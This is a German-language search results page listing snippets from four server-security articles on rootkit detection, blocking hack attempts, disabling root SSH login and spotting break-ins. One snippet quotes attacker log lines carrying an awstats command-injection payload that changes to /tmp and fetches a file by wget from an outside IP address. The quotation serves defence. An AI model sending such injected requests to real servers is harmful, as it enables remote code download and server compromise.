Volltextsuche
4 Suchergebnisse
- Security & Firewalls:
Nach rootkits suchenNach einem erfolgreichen Einbruch oder auch nur bei einem verdacht auf einen Einbruch ins System sollte man auf jedenfall sich auf die Suche nach rootkits - Security & Firewalls:
Hacking-Versuche unterbindenProblem: Es wird ständig versucht den Server zu hacken. Z.B. über's Web (es wird aber jeweils ein 404 ausgelöst): "GET /awstats/awstats.pl?configdir=|echo;echo%20YYY;cd%20%2ftmp%3bwget%20216%2e55%2e168%2e25%2fkillop%[...] "GET /cgi-bin/awstats.pl?configdir=|echo;echo%20YYY;cd%20%2ftmp%3bwget%20216%2e55%2e168%2e25%2fkillop%[...] "GET /cgi-bin/awstats/awstats.pl?configdir=|echo;echo%20YYY;cd%20%2ftmp%3bwget%20216%2e55%2e168%2e25%2 "POST /xmlrpc.php HTTP/1.1" "POST /blog/xmlrpc.php HTTP/1.1" "POST - Security & Firewalls » Kurz-Tips:
Root-Zugang per SSH unterbindenErklärung: Eine Brute-Force-Attacke braucht immer einen bekannten User. Der bekannteste (und auch begehrteste) User ist natürlich root. Daher entzieht man root sicherheitshalber den direkten SSH-Zugang, legt einen - Security & Firewalls:
Woran erkennt man einen erfolgreichen Einbruch (Hack)?Frage: Woran erkennt man denn einen Einbruch? Meistens ist es ja zuspät, weil der Provider bereits den Server gesperrt hat. Antwort: Es sind meist einfache Spuren: Sehr viele unerklärliche Einträge